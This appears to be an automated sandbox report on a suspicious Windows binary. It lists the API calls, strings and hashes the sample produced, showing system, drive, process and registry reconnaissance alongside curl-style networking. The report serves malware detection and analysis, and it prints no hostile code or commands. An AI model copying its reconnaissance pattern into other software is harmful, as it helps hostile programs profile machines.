Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low
Has exited: true


Execution Graph

Execution Coverage: 3.8%
Dynamic/Decrypted Code Coverage: 35.6%
Signature Coverage: 9.8%
Total number of Nodes: 399
Total number of Limit Nodes: 46
Execution graph: rendered interactively in the report; the node/edge serialization is not readable as text and is omitted here. The Windows API calls referenced by the graph nodes, grouped by what they do:
• Process enumeration: Process32FirstW, Process32NextW, QueryFullProcessImageNameA, CloseHandle
• Registry reads: RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey
• Host and file information: GetSystemInfo, GlobalMemoryStatusEx, GetLogicalDrives, FindFirstFileA, CharUpperA, gethostname, if_nametoindex
• Winsock: WSAStartup, socket, ioctlsocket, connect, getsockname, closesocket, send, recv, recvfrom, select, setsockopt, WSAIoctl, WSAEventSelect, WSAEnumNetworkEvents, WSAGetLastError
The sequence socket, ioctlsocket, connect, getsockname, closesocket recurs as a shared subgraph reached from many call sites.
87845->87846 87848 7420449 87846->87848 87850 742015b GetLogicalDrives 87849->87850 87852 7420449 87850->87852 87854 742031f GetLogicalDrives 87853->87854 87856 7420449 87854->87856 87858 74200e3 87857->87858 87859 7420132 GetLogicalDrives 87858->87859 87860 7420124 GetLogicalDrives 87859->87860 87862 7420449 87860->87862 87864 74202a1 GetLogicalDrives 87863->87864 87866 7420449 87864->87866 87868 74201b0 GetLogicalDrives 87867->87868 87870 7420449 87868->87870 87872 74201f6 GetLogicalDrives 87871->87872 87874 7420449 87872->87874 87877 74200d8 87875->87877 87876 7420132 GetLogicalDrives 87878 7420124 GetLogicalDrives 87876->87878 87877->87876 87880 7420449 87878->87880 87882 7420238 GetLogicalDrives 87881->87882 87884 7420449 87882->87884 87886 74200c9 87885->87886 87887 7420132 GetLogicalDrives 87886->87887 87888 7420124 GetLogicalDrives 87887->87888 87890 7420449 87888->87890 87892 7420013 87891->87892 87893 7420132 GetLogicalDrives 87892->87893 87894 7420124 GetLogicalDrives 87893->87894 87896 7420449 87894->87896 87898 7420039 87897->87898 87899 7420132 GetLogicalDrives 87898->87899 87900 7420124 GetLogicalDrives 87899->87900 87902 7420449 87900->87902 87904 74203cf GetLogicalDrives 87903->87904 87906 7420449 87904->87906 87908 7420013 87907->87908 87909 7420132 GetLogicalDrives 87908->87909 87910 7420124 GetLogicalDrives 87909->87910 87912 7420449 87910->87912 87914 7420208 GetLogicalDrives 87913->87914 87916 7420449 87914->87916 87918 74203b4 GetLogicalDrives 87917->87918 87920 7420449 87918->87920 87922 7420189 GetLogicalDrives 87921->87922 87924 7420449 87922->87924 87926 74202a8 GetLogicalDrives 87925->87926 87928 7420449 87926->87928 87930 7420364 GetLogicalDrives 87929->87930 87932 7420449 87930->87932 87934 7420306 GetLogicalDrives 87933->87934 87936 7420449 87934->87936 87938 7420109 87937->87938 87939 7420132 GetLogicalDrives 87938->87939 87940 7420124 GetLogicalDrives 87939->87940 87942 7420449 87940->87942 87944 7420408 GetLogicalDrives 
87943->87944 87945 7420449 87944->87945 87947 74202d1 GetLogicalDrives 87946->87947 87949 7420449 87947->87949 87951 7420039 87950->87951 87952 7420132 GetLogicalDrives 87951->87952 87953 7420124 GetLogicalDrives 87952->87953 87955 7420449 87953->87955 87957 74203c8 GetLogicalDrives 87956->87957 87959 7420449 87957->87959 87961 742006c 87960->87961 87962 7420132 GetLogicalDrives 87961->87962 87963 7420124 GetLogicalDrives 87962->87963 87965 7420449 87963->87965 87967 742008b 87966->87967 87968 7420132 GetLogicalDrives 87967->87968 87969 7420124 GetLogicalDrives 87968->87969 87971 7420449 87969->87971 87973 742008d 87972->87973 87974 7420132 GetLogicalDrives 87973->87974 87975 7420124 GetLogicalDrives 87974->87975 87977 7420449 87975->87977 87979 742015b GetLogicalDrives 87978->87979 87981 7420449 87979->87981 87983 74201e9 GetLogicalDrives 87982->87983 87985 7420449 87983->87985 87987 74200b7 87986->87987 87988 7420132 GetLogicalDrives 87987->87988 87989 7420124 GetLogicalDrives 87988->87989 87991 7420449 87989->87991 87993 74201b0 GetLogicalDrives 87992->87993 87995 7420449 87993->87995 87996 6a8b50 87997 6a8b6b 87996->87997 88015 6a8bb5 87996->88015 87998 6a8b8f 87997->87998 87999 6a8bf3 87997->87999 87997->88015 88031 686e40 select 87998->88031 88016 6aa550 87999->88016 88002 6a8bfc 88005 6a8c1f connect 88002->88005 88006 6a8c35 88002->88006 88013 6a8cb2 88002->88013 88002->88015 88003 6a8cd9 SleepEx getsockopt 88007 6a8d18 88003->88007 88004 6aa150 getsockname 88012 6a8dff 88004->88012 88005->88006 88010 6aa150 getsockname 88006->88010 88008 6a8d43 88007->88008 88007->88013 88011 6aa150 getsockname 88008->88011 88014 6a8ba1 88010->88014 88011->88015 88012->88015 88032 6778b0 closesocket 88012->88032 88013->88004 88013->88012 88013->88015 88014->88003 88014->88013 88014->88015 88017 6aa575 88016->88017 88020 6aa597 88017->88020 88034 6775e0 88017->88034 88019 6778b0 closesocket 88022 6aa713 88019->88022 88021 6aa811 setsockopt 88020->88021 88027 6aa83b 
88020->88027 88030 6aa69b 88020->88030 88021->88027 88022->88002 88024 6aaf56 88025 6aaf5d 88024->88025 88024->88030 88025->88022 88026 6aa150 getsockname 88025->88026 88026->88022 88029 6aabe1 88027->88029 88027->88030 88040 6a6be0 8 API calls 88027->88040 88029->88030 88039 6d67e0 ioctlsocket 88029->88039 88030->88019 88030->88022 88031->88014 88033 6778c5 88032->88033 88033->88015 88035 677607 socket 88034->88035 88036 6775ef 88034->88036 88037 67762b 88035->88037 88036->88035 88038 677643 88036->88038 88037->88020 88038->88020 88039->88024 88040->88029
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                    • API String ID: 0-1590685507
                                    • Opcode ID: 7b43b3d10edc3d9d0677f5f6e0b4b0798b8a504deaf6adeb6e0d014eab3d5377
                                    • Instruction ID: 1c5e3b4b59a988f6e2e04e5caaa26382a82728608f16fd87ac05ec5271272ad4
                                    • Opcode Fuzzy Hash: 7b43b3d10edc3d9d0677f5f6e0b4b0798b8a504deaf6adeb6e0d014eab3d5377
                                    • Instruction Fuzzy Hash: ECC2C371A043449FD724DF68C480BAABBE2BF85314F04866DEC999B352D771ED85CB82

                                    APIs
                                    • GetSystemInfo.KERNELBASE ref: 00672579
                                    • GlobalMemoryStatusEx.KERNELBASE ref: 006725CC
                                    • GetDriveTypeA.KERNELBASE ref: 00672647
                                    • GetDiskFreeSpaceExA.KERNELBASE ref: 0067267E
                                    • KiUserCallbackDispatcher.NTDLL ref: 006727E2
                                    • FindFirstFileW.KERNELBASE ref: 006728F8
                                    • FindNextFileW.KERNELBASE ref: 0067291F
                                    Strings
                                    Similarity
                                    • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                    • String ID: ;%g$@$`
                                    • API String ID: 3271271169-774896648
                                    • Opcode ID: 1432a0598cc889867f6b4a148dfaa04db0e6445c6a396dbaa52d31debe8cbc6a
                                    • Instruction ID: b68cf68d9031f09155f9caf66ea7dc4c1b68ad9d91c12f169e3cf2203e3ebf47
                                    • Opcode Fuzzy Hash: 1432a0598cc889867f6b4a148dfaa04db0e6445c6a396dbaa52d31debe8cbc6a
                                    • Instruction Fuzzy Hash: 83D1B2B49047099FCB00EFA8D5856AEBBF1BF48314F008969F998D7315E7349A84CF92

                                    APIs
                                    Strings
                                    Similarity
                                    • API ID: CloseHandle$CharFileFindFirstFullImageNameOpenProcessQueryUpper
                                    • String ID: 0
                                    • API String ID: 2406880114-4108050209
                                    • Opcode ID: 503d00cbe0aa4b979673624f0200b5490eb9b1103f16c2ca787314d36abe26fe
                                    • Instruction ID: 3d42a077d486d09fda3fa527bb569877ecc56ebc2b8339f8b06a74fcfc52004b
                                    • Opcode Fuzzy Hash: 503d00cbe0aa4b979673624f0200b5490eb9b1103f16c2ca787314d36abe26fe
                                    • Instruction Fuzzy Hash: 07E1F6B09143099FCB50EF78E9856AEBBF5AF44304F408869E998DB354E734DA84CF42

                                    APIs
                                    • WSAEventSelect.WS2_32(?,?,?), ref: 00680712
                                    • WSAEventSelect.WS2_32(?,?,00000000), ref: 006809DD
                                    • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 006809FC
                                    Strings
                                    Similarity
                                    • API ID: EventSelect$EnumEventsNetwork
                                    • String ID: N=g$multi.c
                                    • API String ID: 2170980988-2787237885
                                    • Opcode ID: c30de06339d535dbdc0e69f793e582270f534cbb2647b04a44b2ef6e40440331
                                    • Instruction ID: f4912c1e3d345d7b63b424393806aa0cefb85558db551223eb0aa3d1f097cd93
                                    • Opcode Fuzzy Hash: c30de06339d535dbdc0e69f793e582270f534cbb2647b04a44b2ef6e40440331
                                    • Instruction Fuzzy Hash: B3D1BFB16083019FFB50EF64C881BAB77EABF94304F044E2CF98592252E775E949CB52
                                    APIs
                                    • getsockname.WS2_32(-00000020,-00000020,?), ref: 0073B2B7
                                    Strings
                                    Similarity
                                    • API ID: getsockname
                                    • String ID: ares__sortaddrinfo.c$cur != NULL
                                    • API String ID: 3358416759-2430778319
                                    • Opcode ID: f59fe60d7781305da6e107e1f430d77ff4f3a9ac570700167cbdc9b061a6715f
                                    • Instruction ID: 219c894d1bb95f02e6d11966cec84c77f1ff186f0f0ef855db130b2bcbe42c9a
                                    • Opcode Fuzzy Hash: f59fe60d7781305da6e107e1f430d77ff4f3a9ac570700167cbdc9b061a6715f
                                    • Instruction Fuzzy Hash: ABC17E71604315DFE718DF24C885A6AB7E1FF88314F04896CEA898B3A2D739ED55CB81
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1d39f90f643b93dc9d798319e2bb9893e860e9392148601ce74bedc674b05a1b
                                    • Instruction ID: 7b72c6e70e9b406f7c31b7af0ecdfa33133f7926d181b0eae0ba6800910c5ffd
                                    • Opcode Fuzzy Hash: 1d39f90f643b93dc9d798319e2bb9893e860e9392148601ce74bedc674b05a1b
                                    • Instruction Fuzzy Hash: 2C91D23060D3094BD735AA2988947FAB2D6EBC4364F388B2CE8A9432D4E771DD41D792
                                    APIs
                                    • recvfrom.WS2_32(?,?,?,00000000,00001001,?,?,?,?,?,0072712E,?,?,?,00001001,00000000), ref: 0073A90C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: recvfrom
                                    • String ID:
                                    • API String ID: 846543921-0
                                    • Opcode ID: d07dee2c26e9527469d983ce8b82566c07757adabf903024ab58c64bb3b75f73
                                    • Instruction ID: 2e1f16de4c9853b15ca1f8051002a018523fbffc34b804056fd3d7eccf5f2cad
                                    • Opcode Fuzzy Hash: d07dee2c26e9527469d983ce8b82566c07757adabf903024ab58c64bb3b75f73
                                    • Instruction Fuzzy Hash: C1F01D75109348BFE2209F41DC45E6BBBEDFFC9754F05456DF998232119271AE10CAB2
                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0072AA19
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0072AA4C
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0072AA97
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0072AAE9
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0072AB30
                                    • RegCloseKey.KERNELBASE(?), ref: 0072AB6A
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0072AB82
                                    • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0072AC46
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0072AD0A
                                    • RegEnumKeyExA.KERNELBASE ref: 0072AD8D
                                    • RegCloseKey.KERNELBASE(?), ref: 0072ADD9
                                    • RegEnumKeyExA.KERNELBASE ref: 0072AE08
                                    • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0072AE2A
                                    • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0072AE54
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0072AF63
                                    • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0072AFB2
                                    • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0072B072
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: QueryValue$Open$CloseEnum
                                    • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                    • API String ID: 4217438148-1047472027
                                    • Opcode ID: 3722d9475590e4c09b05cdecfc107331db11c136335595f55b19c2b7c3fce379
                                    • Instruction ID: d3b1991746eacf7428cbef8f5ba1ff3445c2e719725270f9575706f7bc7ab1cb
                                    • Opcode Fuzzy Hash: 3722d9475590e4c09b05cdecfc107331db11c136335595f55b19c2b7c3fce379
                                    • Instruction Fuzzy Hash: F672AFB1604351AFE720DB24EC85B6B77E8AF85700F14482CF985DB2A1E779E944CB63
                                    APIs
                                    • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 006AA832
                                    Strings
                                    • cf_socket_open() -> %d, fd=%d, xrefs: 006AA796
                                    • @, xrefs: 006AAC42
                                    • Local port: %hu, xrefs: 006AAF28
                                    • Could not set TCP_NODELAY: %s, xrefs: 006AA871
                                    • bind failed with errno %d: %s, xrefs: 006AB080
                                    • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 006AA6CE
                                    • Couldn't bind to '%s' with errno %d: %s, xrefs: 006AAE1F
                                    • Local Interface %s is ip %s using address family %i, xrefs: 006AAE60
                                    • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 006AAD0A
                                    • @, xrefs: 006AA8F4
                                    • Bind to local port %d failed, trying next, xrefs: 006AAFE5
                                    • Name '%s' family %i resolved to '%s' family %i, xrefs: 006AADAC
                                    • cf-socket.c, xrefs: 006AA5CD, 006AA735
                                    • Trying [%s]:%d..., xrefs: 006AA689
                                    • Trying %s:%d..., xrefs: 006AA7C2, 006AA7DE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: setsockopt
                                    • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                    • API String ID: 3981526788-2373386790
                                    • Opcode ID: c6fc34f5be12cc443941624e74f6af5c609c818fcf79d1022b9cb5acac9184fd
                                    • Instruction ID: aefe1e6b949c12c7e9385d9c23994a5cd73745eb8d04bb0e3e228fd228947064
                                    • Opcode Fuzzy Hash: c6fc34f5be12cc443941624e74f6af5c609c818fcf79d1022b9cb5acac9184fd
                                    • Instruction Fuzzy Hash: BE62E471504341ABE721AF54C846BEBB7E6BF82314F04492EF98897292E771EC45CB93

                                    Control-flow Graph

                                    APIs
                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00739946
                                    • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00739974
                                    • RegCloseKey.KERNELBASE(?), ref: 0073998B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                    • API String ID: 3677997916-615551945
                                    • Opcode ID: 6577b67d770a4908756ed02aa39f6afb5247ea177e2e93424428d150d9d6a511
                                    • Instruction ID: 8ce6a6318997c51c36ec661a64638b8f924cebac3df72765d94f5cac218297e4
                                    • Opcode Fuzzy Hash: 6577b67d770a4908756ed02aa39f6afb5247ea177e2e93424428d150d9d6a511
                                    • Instruction Fuzzy Hash: C23294F5904211EBFB11AB24FC46A2B76E4AF54314F084838FA4996263F779ED14C793

                                    Control-flow Graph

                                    APIs
                                    • connect.WS2_32(?,?,00000001), ref: 006A8C30
                                    • SleepEx.KERNELBASE(00000000,00000000), ref: 006A8CF3
                                    • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 006A8D0E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: Sleepconnectgetsockopt
                                    • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                    • API String ID: 1669343778-879669977
                                    • Opcode ID: 69d65bfb62bdfb859e85baed0f859005b61be9928978801c55402ff9df6e69f5
                                    • Instruction ID: 8d0385728c85b99fe567846eacca37e03f197c16599a6813704f548f508c347b
                                    • Opcode Fuzzy Hash: 69d65bfb62bdfb859e85baed0f859005b61be9928978801c55402ff9df6e69f5
                                    • Instruction Fuzzy Hash: 18B1C070604706AFDB10EF24C885BA6B7E2AF56314F04856CE85A4B3D2DB71EC54CF62

                                    Control-flow Graph
                                    • Graph of function starting at 672f17; API calls on the graph: RegOpenKeyExA, RegEnumKeyExA, RegQueryValueExA, RegCloseKey
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: EnumOpen
                                    • String ID: d
                                    • API String ID: 3231578192-2564639436
                                    • Opcode ID: 1c8687020bcdd67ba5f66596051683e8d9c689f5fb1049ee0fb7332b9cee1a4a
                                    • Instruction ID: fba076207537aafca5c6832949c23252b447179644c3d2bc823ed79b6c0c7f9d
                                    • Opcode Fuzzy Hash: 1c8687020bcdd67ba5f66596051683e8d9c689f5fb1049ee0fb7332b9cee1a4a
                                    • Instruction Fuzzy Hash: 4871C4B49043199FDB00EF68D58479EBBF1BF84308F10886DE89897315E7749A888F92

                                    Control-flow Graph
                                    • Graph of function starting at 6776a0; API calls on the graph: send
                                    APIs
                                    • send.WS2_32(multi.c,?,?,?,N=g,00000000,?,?,006807BF), ref: 006776EB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID: LIMIT %s:%d %s reached memlimit$N=g$SEND %s:%d send(%lu) = %ld$multi.c$send
                                    • API String ID: 2809346765-379084146
                                    • Opcode ID: 41a6f1387f988e8ed7a06922ac5697c370a7b639f9800065bbd7ca9d3f4b5b34
                                    • Instruction ID: 47e7853ce78a6586357174791ed47189402c2c8dc73f44deb036123bcc4b0265
                                    • Opcode Fuzzy Hash: 41a6f1387f988e8ed7a06922ac5697c370a7b639f9800065bbd7ca9d3f4b5b34
                                    • Instruction Fuzzy Hash: 82112CB5A293487BD1109756AC8AE2B3B5DDBC2B68F450919FC0C57383D5729D0087B1

                                    Control-flow Graph
                                    • Graph of function starting at 6a9290; API calls on the graph: WSAIoctl, setsockopt
                                    APIs
                                    • WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 006A935D
                                    • setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 006A9389
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: Ioctlsetsockopt
                                    • String ID: Send failure: %s$cf-socket.c$send(len=%zu) -> %d, err=%d
                                    • API String ID: 1903391676-2691795271
                                    • Opcode ID: f8e2c860be26c41437c56ce4884e277b7ebe67e7113d98fbe28f1f6ed2831db8
                                    • Instruction ID: 51f2fe417c9aaa53eebd3456f49eb64de4ac5e2c02eb1d42f24f5a9cc7be10e9
                                    • Opcode Fuzzy Hash: f8e2c860be26c41437c56ce4884e277b7ebe67e7113d98fbe28f1f6ed2831db8
                                    • Instruction Fuzzy Hash: 7151B370600305ABEB10EF24C881FAA77A6FF8A314F248569FD489B382D731ED51CB61

                                    Control-flow Graph
                                    • Graph of function starting at 7420190; API calls on the graph: GetLogicalDrives
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\$A:\$ZXZX
                                    • API String ID: 999431828-590421744
                                    • Opcode ID: e9668bbcca0d5a7b974e7f1a3dce7bd857d84b9b19a8f4c9fc691315853abe6e
                                    • Instruction ID: a2db029a940ba6ff9d8dc0e10e805127618558f0bb617f40a19de314666ffe4a
                                    • Opcode Fuzzy Hash: e9668bbcca0d5a7b974e7f1a3dce7bd857d84b9b19a8f4c9fc691315853abe6e
                                    • Instruction Fuzzy Hash: 92615EEB26D131BE7142C1816B14AFB67AEE5C7730BB1C827F807D6512E2984E6B7035

                                    Control-flow Graph
                                    • Graph of function starting at 677770; API calls on the graph: recv
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: recv
                                    • String ID: LIMIT %s:%d %s reached memlimit$RECV %s:%d recv(%lu) = %ld$recv
                                    • API String ID: 1507349165-640788491
                                    • Opcode ID: 11217d119e7dccfb34fb73e8f4d9e4817a9094e50d7e815cce8d9a5235f4b90c
                                    • Instruction ID: 3d4f14de873e890d5dd787123b5c30eec5894fa34c1eb92cf028fe8bf4a65cae
                                    • Opcode Fuzzy Hash: 11217d119e7dccfb34fb73e8f4d9e4817a9094e50d7e815cce8d9a5235f4b90c
                                    • Instruction Fuzzy Hash: BF113AB9A183447BE110D7119C4AE2B7B5DDBC6B68F05492DFC0C53382D1719C0086B2

                                    Control-flow Graph
                                    • Graph of function starting at 6775e0; API calls on the graph: socket
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID: FD %s:%d socket() = %d$LIMIT %s:%d %s reached memlimit$socket
                                    • API String ID: 98920635-842387772
                                    • Opcode ID: 3259b650cb13e2512c410798dba41a321d68658bd35e77b77f824b0ccb7a8f99
                                    • Instruction ID: e436abc2a215a6d017df2a7db3d6d12309ad983893ec9090a8b89ff72180ebb3
                                    • Opcode Fuzzy Hash: 3259b650cb13e2512c410798dba41a321d68658bd35e77b77f824b0ccb7a8f99
                                    • Instruction Fuzzy Hash: AE112576A2039227DA10566AAC1BFDB3B89DBC2724F054925F818963D3D2328D94D3E1

                                    Control-flow Graph
                                    • Graph of function starting at 742000b; API calls on the graph: GetLogicalDrives
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
